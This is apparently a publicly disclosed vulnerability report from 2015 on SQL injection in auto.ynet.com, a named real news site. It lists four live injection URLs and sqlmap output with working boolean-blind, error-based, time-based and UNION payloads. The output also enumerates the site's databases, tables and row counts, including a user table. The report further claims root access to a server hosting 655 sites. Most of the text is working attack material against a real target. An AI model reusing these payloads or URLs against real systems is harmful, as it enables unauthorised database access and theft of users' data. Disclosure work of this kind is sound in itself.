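2015-09-19: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2015-11-03: The vendor has actively ignored the vulnerability; details disclosed to the public
Subsites include: news, current affairs, entertainment, sports, news specials, Olympics, society, rule of law, focus, commentary, in-depth, online commentary, global, forum, pictures, spotlight, strange news, true stories, etc.
1. All kinds of data, all kinds of leaks (different data on different subsites)
2. ROOT privileges (can be penetrated, privileges can be escalated, you know how much harm that can do; 655 on the same server)
3. World rank: 4,757 Traffic rank: 6689 Daily IPs ≈ 186,000 Daily PVs ≈ 892,800 (black-market operators, I am here to put an end to your schemes -_-. sorry!)
Injection points
http://auto.ynet.com/cgi/newslist.php?dir=101
http://auto.ynet.com/cgi/news.php?id=532927
http://auto.ynet.com/cgi/subbrand.php?subid=44
http://auto.ynet.com/cgi/configuration.php?subid=44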
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=532927 AND 8026=8026

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb)

    Type: UNION query
    Title: MySQL UNION query (22) - 28 columns
    Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
available databases [3]:
[*] foodbq
[*] information_schema
[*] web_2_1

current database: 'web_2_1'

Database: web_2_1
[40 tables]
+-----------------+
| global          |
| user            |
| article_from    |
| auto_ad         |
| auto_bang       |
| auto_beauty     |
| auto_big_brands |
| auto_bqyc       |
| auto_brands     |
| auto_cars       |
| auto_comment    |
| auto_index      |
| auto_photo      |
| auto_subbrands  |
| auto_zhuanti    |
| baojia_4s       |
| beauty_album    |
| beauty_index    |
| blank_data      |
| complain        |
| dealers         |
| fenlei          |
| fenlei_beauty   |
| friend_links    |
| index_car2013   |
| market_cars     |
| navcode         |
| navigation      |
| news            |
| news_top        |
| polymorphic     |
| sp_t28          |
| sp_t32          |
| sp_t33          |
| sp_t34          |
| sp_t35          |
| sp_t36          |
| temp            |
| tempdef         |
| tuijian_top     |
+-----------------+

Database: web_2_1
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| auto_cars       | 13346   |
| news            | 9507    |
| auto_photo      | 6252    |
| auto_subbrands  | 1522    |
| sp_t36          | 904     |
| tempdef         | 711     |
| `user`          | 446     |
| auto_beauty     | 354     |
| auto_brands     | 205     |
| auto_comment    | 150     |
| auto_big_brands | 138     |
| beauty_album    | 55      |
| baojia_4s       | 37      |
| temp            | 34      |
| fenlei          | 33      |
| dealers         | 28      |
| friend_links    | 23      |
| complain        | 20      |
| sp_t32          | 16      |
| market_cars     | 14      |
| tuijian_top     | 13      |
| auto_ad         | 9       |
| auto_zhuanti    | 9       |
| sp_t33          | 8       |
| news_top        | 5       |
| sp_t28          | 5       |
| fenlei_beauty   | 4       |
| navcode         | 3       |
| `global`        | 2       |
| article_from    | 1       |
| auto_bang       | 1       |
| auto_bqyc       | 1       |
| auto_index      | 1       |
| beauty_index    | 1       |
| blank_data      | 1       |
| index_car2013   | 1       |
| polymorphic     | 1       |
| sp_t34          | 1       |
| sp_t35          | 1       |
+-----------------+---------+
Same as above
- -
Unable to contact the vendor, or the vendor actively refused